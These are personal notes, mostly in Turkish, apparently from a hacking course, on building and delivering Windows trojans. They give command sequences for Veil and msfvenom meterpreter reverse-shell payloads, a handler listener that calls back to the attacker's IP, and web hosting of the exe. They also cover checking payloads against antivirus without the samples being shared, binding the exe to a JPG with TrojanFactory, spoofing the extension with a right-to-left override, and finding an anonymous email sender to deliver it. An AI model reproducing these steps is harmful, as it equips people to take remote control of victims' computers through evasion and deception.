list

use 1

list

use 14

set LHOST IPADRESİMİZ

set LPORT 8080 (server yaptığımızda port çakışması olmaması için)

options

generate

isim gir

exe'yi antivirüslerde no distribution sitelerde tarat

________________
msfconsole'a gir

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_http

set LPORT 8080

set LHOST IPADRESİMİZ

exploit
______________

exe'mizi web sunucumuza atıyoruz:

/var/www/html/dosyalar/exemiz.exe

service apache2 start

exe çalıştırıldığında bağlantı sağlanır

ls komutu verildi
çalışmadı - veil'dan kaynaklı bir problem olduğu yazıyordu, msfvenom ile
oluşturulan virüslerde olmuyormuş

backdoor için araçlar: msfvenom, thefatrat, unicorn, empireproject

MSFVENOM ile trojan oluşturma:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.10 LPORT=8080 -f exe R
> /root/Desktop/mesela3.exe
daha sonra msfconsole ile yukarıdaki adımları uygun şekilde değiştir

---------------
Jpeg ile Exe'yi birleştirme
jpg dosyası ile ico oluştur
https://github.com/z00z/TrojanFactory
Buradaki adımları kullanarak yazılımı yükle

python3 trojan_factory.py --help

python3 trojan_factory.py -f öndekidosya.jpg -e arkadakidosya.exe -o yenidosya.exe
-i icondosyasi.ico
python3 trojan_factory.py -f /var/www/html/dosyalar/piano.jpg -e
/var/www/html/dosyalar/Powerfull-fud.exe -o /var/www/html/dosyalar/yenidosya.exe -i
/var/www/html/dosyalar/piano.ico

------------

Uzantı değiştirme
apt-get install gnome-characters
Characters uygulamasını aç
right-to-left'i kopyala
gpj.exe yaz

---------------

anonymous email sender - ara